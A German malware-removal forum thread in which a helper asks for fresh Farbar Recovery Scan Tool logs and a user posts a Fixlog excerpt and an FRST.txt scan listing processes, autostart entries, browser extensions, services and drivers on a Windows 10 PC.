 2 3 . 1 1 . 2 0 1 6    2 1 : 4 7        < D I R >                    r o c k b o x . o r g
 
                              0  D a t e i ( e n ) ,                            0  B y t e s
 
                            4 0  V e r z e i c h n i s ( s e ) ,  8 6 . 0 3 0 . 1 5 5 . 7 7 6  B y t e s  f r e i
 
 
 
 = = = = = = = = =  E n d e  v o n  C M D :  = = = = = = = = =
 
 
 
 
 
 = = = = = = = = =  d i r  / o g e - d  " % A P P D A T A % \ M i c r o s o f t \ W i n d o w s \ S t a r t  M e n u \ P r o g r a m s \ S t a r t u p "  = = = = = = = = =
 
 
 
  D a t e n t r  g e r  i n  L a u f w e r k  C :  i s t  S S D
 
  V o l u m e s e r i e n n u m m e r :  2 A 2 B - 9 5 9 B
 
 
 
  V e r z e i c h n i s  v o n  C : \ U s e r s \ P a t r i c k \ A p p D a t a \ R o a m i n g \ M i c r o s o f t \ W i n d o w s \ S t a r t  M e n u \ P r o g r a m s \ S t a r t u p
 
 
 
 1 0 . 1 1 . 2 0 1 6    1 9 : 2 7        < D I R >                    . .
 
 1 0 . 1 1 . 2 0 1 6    1 9 : 2 7        < D I R >                    .
 
 2 0 . 0 3 . 2 0 1 6    0 0 : 0 8                          1 . 1 0 2  M E G A s y n c . l n k
 
                              1  D a t e i ( e n ) ,                    1 . 1 0 2  B y t e s
 
                              2  V e r z e i c h n i s ( s e ) ,  8 6 . 0 3 0 . 1 5 5 . 7 7 6  B y t e s  f r e i
 
 
 
 = = = = = = = = =  E n d e  v o n  C M D :  = = = = = = = = =
 
 
 
 
 
 = = = = = = = = =  d i r  / o g e - d  " % P R O G R A M D A T A % "  = = = = = = = = =
 
 
 
  D a t e n t r  g e r  i n  L a u f w e r k  C :  i s t  S S D
 
  V o l u m e s e r i e n n u m m e r :  2 A 2 B - 9 5 9 B
 
 
 
  V e r z e i c h n i s  v o n  C : \ P r o g r a m D a t a
 
 
 
 0 3 . 1 2 . 2 0 1 6    2 1 : 2 7        < D I R >                    N V I D I A
 
 0 2 . 1 2 . 2 0 1 6    2 0 : 4 7        < D I R >                    M a l w a r e b y t e s '  A n t i - M a l w a r e  ( p o r t a b l e )
 
 0 2 . 1 2 . 2 0 1 6    2 0 : 3 9        < D I R >                    M a l w a r e b y t e s
 
 0 2 . 1 2 . 2 0 1 6    1 9 : 3 1        < D I R >                    P a c k a g e  C a c h e
 
 2 6 . 1 1 . 2 0 1 6    0 1 : 5 2        < D I R >                    O r a c l e
 
 1 9 . 1 1 . 2 0 1 6    0 3 : 1 4        < D I R >                    N V I D I A  C o r p o r a t i o n
 
 1 3 . 1 1 . 2 0 1 6    2 3 : 2 0        < D I R >                    A d v e n t u r e  G a m e  S t u d i o
 
 0 8 . 1 1 . 2 0 1 6    2 2 : 1 5        < D I R >                    M i c r o s o f t  H e l p
 
 0 6 . 1 1 . 2 0 1 6    2 3 : 1 9        < D I R >                    3 D  S y s t e m s
 
 0 6 . 1 1 . 2 0 1 6    1 8 : 1 0        < D I R >                    D a s s a u l t S y s t e m e s
 
 1 9 . 1 0 . 2 0 1 6    2 1 : 4 4        < D I R >                    S p y b o t  -  S e a r c h  &  D e s t r o y
 
 1 9 . 1 0 . 2 0 1 6    0 6 : 2 6        < D I R >                    S a f e N e t  S e n t i n e l
 
 1 9 . 1 0 . 2 0 1 6    0 6 : 2 3        < D I R >                    C i m a t r o n
 
 3 0 . 0 9 . 2 0 1 6    1 5 : 5 7        < D I R >                    R a z e r
 
 2 4 . 0 9 . 2 0 1 6    1 8 : 5 5        < D I R >                    S h u a m e
 
 2 4 . 0 9 . 2 0 1 6    1 7 : 1 3        < D I R >                    Y a n d e x
 
 2 4 . 0 9 . 2 0 1 6    1 6 : 3 8        < D I R >                    M i c r o s o f t  O n e D r i v e
 
 2 4 . 0 9 . 2 0 1 6    1 6 : 3 7        < D I R >                    U S O P r i v a t e
 
 2 4 . 0 9 . 2 0 1 6    1 6 : 3 7        < D I R >                    U S O S h a r e d
 
 1 6 . 0 7 . 2 0 1 6    1 2 : 4 7        < D I R >                    S o f t w a r e D i s t r i b u t i o n
 
 1 6 . 0 7 . 2 0 1 6    1 2 : 4 7        < D I R >                    C o m m s
 
 0 8 . 0 7 . 2 0 1 6    2 3 : 0 2        < D I R >                    F r e e m a k e
 
 1 8 . 0 6 . 2 0 1 6    0 0 : 1 8        < D I R >                    S t e a m
 
 1 0 . 0 6 . 2 0 1 6    0 6 : 1 9        < D I R >                    A p o w e r s o f t
 
 0 3 . 0 5 . 2 0 1 6    2 2 : 2 1        < D I R >                    X 3 6 0 C E
 
 1 9 . 0 1 . 2 0 1 6    2 2 : 0 3        < D I R >                    F r e e R I P  M P 3  C o n v e r t e r
 
 2 3 . 1 2 . 2 0 1 5    0 0 : 0 5        < D I R >                    A t h e r o s
 
 2 3 . 1 2 . 2 0 1 5    0 0 : 0 1        < D I R >                    A d o b e
 
 2 2 . 1 2 . 2 0 1 5    2 3 : 1 8        < D I R >                    D A E M O N  T o o l s  L i t e
 
 2 2 . 1 2 . 2 0 1 5    2 3 : 0 0        < D I R >                    Q u a l c o m m  A t h e r o s
 
 2 4 . 0 9 . 2 0 1 6    1 6 : 3 0        < D I R >                    r e g i d . 1 9 9 1 - 0 6 . c o m . m i c r o s o f t
 
 2 4 . 1 1 . 2 0 1 6    2 1 : 1 8                          1 . 5 3 4  s s . i n i
 
                              1  D a t e i ( e n ) ,                    1 . 5 3 4  B y t e s
 
                            3 1  V e r z e i c h n i s ( s e ) ,  8 6 . 0 3 0 . 1 5 1 . 6 8 0  B y t e s  f r e i
 
 
 
 = = = = = = = = =  E n d e  v o n  C M D :  = = = = = = = = =
 
 
 
 
 
 = = = = = = = = = = =  E m p t y T e m p :  = = = = = = = = = =
 
 
 
 B I T S  t r a n s f e r  q u e u e  = >  0  B
 
 D O M S t o r e ,  I E  R e c o v e r y ,  A p p C a c h e ,  F e e d s  C a c h e ,  T h u m b c a c h e ,  I c o n C a c h e  = >  8 6 8 9 8 4 6  B
 
 J a v a ,  F l a s h ,  S t e a m  h t m l c a c h e  = >  4 9 2  B
 
 W i n d o w s / s y s t e m / d r i v e r s  = >  - 8 4 0 0 7 4 3  B
 
 E d g e  = >  0  B
 
 C h r o m e  = >  0  B
 
 F i r e f o x  = >  1 5 3 6 9 3 2 4 7  B
 
 O p e r a  = >  0  B
 
 
 
 T e m p ,  I E  c a c h e ,  h i s t o r y ,  c o o k i e s ,  r e c e n t :
 
 D e f a u l t  = >  0  B
 
 P r o g r a m D a t a  = >  0  B
 
 P u b l i c  = >  0  B
 
 s y s t e m p r o f i l e  = >  0  B
 
 s y s t e m p r o f i l e 3 2  = >  0  B
 
 L o c a l S e r v i c e  = >  3 2 9 2  B
 
 N e t w o r k S e r v i c e  = >  2 6 5 4  B
 
 P a t r i c k  = >  1 3 6 3 8  B
 
 
 
 R e c y c l e B i n  = >  1 4 1 3 0  B
 
 E m p t y T e m p :  = >  1 4 6 . 9  M B  t e m p o r ä r e  D a t e i e n  e n t f e r n t .
 
 
 
 = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
 
 
 
 
 
 D a s  S y s t e m  m u s s t e  n e u  g e s t a r t e t  w e r d e n .
 
 
 
 = = = =  E n d e  v o n  F i x l o g  2 1 : 2 7 : 2 6  = = = =

cosinus 05.12.2016 09:39
Dann zeig mal frische FRST Logs. Haken setzen bei addition.txt dann auf Untersuchen klicken

http://www.trojaner-board.de/picture...&pictureid=611

Machalla666 05.12.2016 17:15
Okidoki, hier FRST.txt:
Code:
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 04-12-2016
durchgeführt von Patrick (Administrator) auf DESKTOP-I54T4B7 (05-12-2016 17:10:37)
Gestartet von C:\Users\Patrick\Desktop
Geladene Profile: Patrick (Verfügbare Profile: Patrick)
Platform: Windows 10 Home Version 1607 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: FF)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDService.exe
(SafeNet Inc.) C:\Windows\System32\hasplms.exe
() C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe
(Windows (R) Win 7 DDK provider) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(Dritek System INC.) C:\Windows\RfBtnSvc64.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\nvwirelesscontroller.exe
(YANDEX LLC) C:\Program Files (x86)\Yandex\YandexBrowser\16.10.1.1114\service_update.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(Microsoft Corporation) C:\Windows\System32\InputMethod\CHS\ChsIME.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Intel Corporation) C:\Windows\System32\igfxTray.exe
(Microsoft Corporation) C:\Windows\System32\InputMethod\CHS\ChsIME.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrlHelper.exe
(Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Atheros Communications) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
() C:\Program Files (x86)\Bluetooth Suite\ActivateDesktop.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Dritek System Inc.) C:\Program Files (x86)\RadioController\RfBtnHelper.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
() C:\Program Files (x86)\UtechSmart 16400DPI VENUS Gaming Mouse\OGMMon.exe

==================== Registry (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [ETDCtrl] => C:\Program Files\Elantech\ETDCtrl.exe [3242696 2015-10-07] (ELAN Microelectronics Corp.)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13653208 2013-09-13] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1321688 2013-08-30] (Realtek Semiconductor)
HKLM-x32\...\Run: [RadioController] => C:\Program Files (x86)\RadioController\RfBtnHelper.exe [111216 2015-12-22] (Dritek System Inc.)
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
HKLM-x32\...\Run: [PDFPrint] => C:\Program Files (x86)\PDF24\pdf24.exe [226816 2016-05-23] (Geek Software GmbH)
HKLM-x32\...\Run: [ProductUpdater] => C:\Program Files (x86)\Common Files\Freemake Shared\ProductUpdater\ProductUpdater.exe
HKLM-x32\...\Run: [OGMgmmouseRun] => C:\Program Files (x86)\UtechSmart 16400DPI VENUS Gaming Mouse\ogmmon.exe [3386880 2014-05-19] ()
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKLM\...\Policies\Explorer\Run: [BtvStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [132736 2013-09-07] (Atheros Communications)
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [2860832 2016-10-13] (Valve Corporation)
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8912088 2016-08-26] (Piriform Ltd)
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\Run: [SpybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.)
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\Run: [ctfmon] => C:\WINDOWS\system32\ctfmon.exe [10752 2016-07-16] (Microsoft Corporation)
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [4557504 2016-10-06] (Disc Soft Ltd)
ShellIconOverlayIdentifiers: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Patrick\AppData\Local\MEGAsync\ShellExtX64.dll [2016-11-22] ()
ShellIconOverlayIdentifiers: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Patrick\AppData\Local\MEGAsync\ShellExtX64.dll [2016-11-22] ()
ShellIconOverlayIdentifiers: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Patrick\AppData\Local\MEGAsync\ShellExtX64.dll [2016-11-22] ()
ShellIconOverlayIdentifiers-x32: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Patrick\AppData\Local\MEGAsync\ShellExtX32.dll [2016-11-22] ()
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Patrick\AppData\Local\MEGAsync\ShellExtX32.dll [2016-11-22] ()
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Patrick\AppData\Local\MEGAsync\ShellExtX32.dll [2016-11-22] ()
Startup: C:\Users\Patrick\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MEGAsync.lnk [2016-03-20]
ShortcutTarget: MEGAsync.lnk -> C:\Users\Patrick\AppData\Local\MEGAsync\MEGAsync.exe (Mega Limited)

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Hosts: Es ist mehr als ein Eintrag in der Hosts Datei zu finden. Siehe Hosts-Bereich in Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{ce2c89b3-0cea-4292-b4ba-fd6c0e758f97}: [DhcpNameServer] 192.168.178.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> DefaultScope Wert fehlt
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\ssv.dll [2016-11-26] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\jp2ssv.dll [2016-11-26] (Oracle Corporation)

FireFox:
========
FF DefaultProfile: 5fqwv91p.default
FF ProfilePath: C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default [2016-12-05]
FF Keyword.URL: Mozilla\Firefox\Profiles\5fqwv91p.default -> user_pref("keyword.URL", true);
FF Extension: (Alldebrid extension) - C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default\Extensions\alldebrid@alldebrid.com.xpi [2016-11-07]
FF Extension: (Classic Theme Restorer) - C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default\Extensions\ClassicThemeRestorer@ArisT2Noia4dev.xpi [2016-11-21]
FF Extension: (Classic Reload-Stop-Go Button) - C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default\Extensions\crsg@ArisT2_Noia4dev.xpi [2016-06-18]
FF Extension: (StatusbarEx) - C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default\Extensions\doudehou@gmail.com [2016-04-27]
FF Extension: (ExHentai Easy 2) - C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default\Extensions\jid1-7NbXi2AqS1oUFw@jetpack.xpi [2016-08-12]
FF Extension: (Video WithOut Flash) - C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default\Extensions\vwof@drev.com.xpi [2016-01-13]
FF Extension: (Download Status Bar) - C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default\Extensions\{6c28e999-e900-4635-a39d-b1ec90ba0c0f}.xpi [2016-09-27]
FF Extension: (NoScript) - C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default\Extensions\{73a6fe31-595d-460b-a920-fcc0f8843232}.xpi [2016-11-29]
FF Extension: (Web Developer) - C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default\Extensions\{c45c406e-ab73-11d8-be73-000a95be3b12}.xpi [2016-08-18]
FF Extension: (Greasemonkey) - C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default\Extensions\{e4a8a97b-f2ed-450b-b12d-ee082ba24781}.xpi [2016-08-19]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_23_0_0_207.dll [2016-11-12] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_23_0_0_207.dll [2016-11-12] ()
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll [2015-10-13] (Google, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\dtplugin\npDeployJava1.dll [2016-11-26] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\plugin2\npjp2.dll [2016-11-26] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/OfficeLive,version=1.5 -> C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll [2010-04-26] (Microsoft Corp.)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-29] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-29] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-10-01] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-3097098544-2319845998-2187571786-1001: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Patrick\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-12-17] (Unity Technologies ApS)

Chrome:
=======
CHR Profile: C:\Users\Patrick\AppData\Local\Google\Chrome\User Data\Default [2016-12-03]
CHR Extension: (Google Präsentationen) - C:\Users\Patrick\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-12-22]
CHR Extension: (Google Docs) - C:\Users\Patrick\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-12-22]
CHR Extension: (Google Drive) - C:\Users\Patrick\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-12-22]
CHR Extension: (YouTube) - C:\Users\Patrick\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-12-22]
CHR Extension: (Google-Suche) - C:\Users\Patrick\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-12-22]
CHR Extension: (Google Tabellen) - C:\Users\Patrick\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-12-22]
CHR Extension: (Google Docs Offline) - C:\Users\Patrick\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-16]
CHR Extension: (Core) - C:\Users\Patrick\AppData\Local\Google\Chrome\User Data\Default\Extensions\gkhcgfdghbiidgeccbldhfceleibkkpe [2016-03-13]
CHR Extension: (SearchPreview) - C:\Users\Patrick\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcjdanpjacpeeppdjkppebobilhaglfo [2016-10-29]
CHR Extension: (vGet Extension (Video Downloader, DLNA)) - C:\Users\Patrick\AppData\Local\Google\Chrome\User Data\Default\Extensions\hniladkejehjfchadikcbjmgjaogciic [2016-07-12]
CHR Extension: (Mountain Browse) - C:\Users\Patrick\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhgknfkfipiflalfpihaicjijikenfoj [2016-12-03]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Patrick\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-02]
CHR Extension: (Unblock Youku) - C:\Users\Patrick\AppData\Local\Google\Chrome\User Data\Default\Extensions\pdnfnkhpgegpcingjbfihlkjeighnddk [2016-11-18]
CHR Extension: (Google Mail) - C:\Users\Patrick\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-12-22]
CHR Extension: (Chrome Media Router) - C:\Users\Patrick\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-10-29]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [312448 2013-09-07] (Windows (R) Win 7 DDK provider) [Datei ist nicht signiert]
S3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [1468608 2016-10-06] (Disc Soft Ltd)
R2 ETDService; C:\Program Files\Elantech\ETDService.exe [144072 2015-10-07] (ELAN Microelectronics Corp.)
R2 hasplms; C:\WINDOWS\system32\hasplms.exe [4609928 2013-08-01] (SafeNet Inc.)
R2 HuaweiHiSuiteService64.exe; C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe [192200 2016-08-26] () [Datei ist nicht signiert]
R2 igfxCUIService1.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [337888 2016-05-03] (Intel Corporation)
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [458296 2016-10-25] (NVIDIA Corporation)
S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [458296 2016-10-25] (NVIDIA Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [458176 2016-11-17] (NVIDIA Corporation)
R2 NVIDIA Wireless Controller Service; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\nvwirelesscontroller.exe [1165368 2016-10-25] (NVIDIA Corporation)
R2 RfButtonDriverService; C:\Windows\RfBtnSvc64.exe [96880 2015-12-22] (Dritek System INC.)
R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [4088608 2016-09-21] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation)
R2 YandexBrowserService; C:\Program Files (x86)\Yandex\YandexBrowser\16.10.1.1114\service_update.exe [885752 2016-11-09] (YANDEX LLC)

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S3 ampa; C:\Windows\system32\ampa.sys [19568 2015-11-10] () [Datei ist nicht signiert]
S3 ampa; C:\Windows\SysWOW64\ampa.sys [19568 2015-11-10] () [Datei ist nicht signiert]
S3 BTATH_LWFLT; C:\WINDOWS\system32\DRIVERS\btath_lwflt.sys [77464 2013-09-07] (Qualcomm Atheros)
R3 dtlitescsibus; C:\WINDOWS\System32\drivers\dtlitescsibus.sys [30264 2015-12-22] (Disc Soft Ltd)
R3 dtliteusbbus; C:\WINDOWS\System32\drivers\dtliteusbbus.sys [47672 2016-10-07] (Disc Soft Ltd)
R2 hardlock; C:\WINDOWS\system32\drivers\hardlock.sys [331328 2013-08-01] (SafeNet Inc.)
U5 hw_usbdev; C:\Windows\System32\Drivers\hw_usbdev.sys [116864 2016-05-25] (Huawei Technologies Co., Ltd.)
R2 kbdssvc; C:\WINDOWS\System32\drivers\kbdssvc.sys [112408 2014-10-31] (CFCA)
S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nvaci.inf_amd64_9debaf626fb26761\nvlddmkm.sys [14174256 2016-11-18] (NVIDIA Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [29240 2016-10-25] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [47672 2016-10-25] (NVIDIA Corporation)
R3 Ps2Kb2Hid; C:\WINDOWS\System32\drivers\aPs2Kb2Hid.sys [26736 2015-12-22] (Dritek System Inc.)
S3 ScpVBus; C:\WINDOWS\System32\drivers\ScpVBus.sys [39168 2013-05-19] (Scarlet.Crush Productions)
R3 SmbDrvI; C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys [34544 2013-08-28] (Synaptics Incorporated)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-12-03 21:27 - 2016-12-03 21:27 - 00020916 _____ C:\Users\Patrick\Desktop\Fixlog.txt
2016-12-03 19:41 - 2016-12-05 17:10 - 00000000 ____D C:\Users\Patrick\Desktop\FRST-OlderVersion
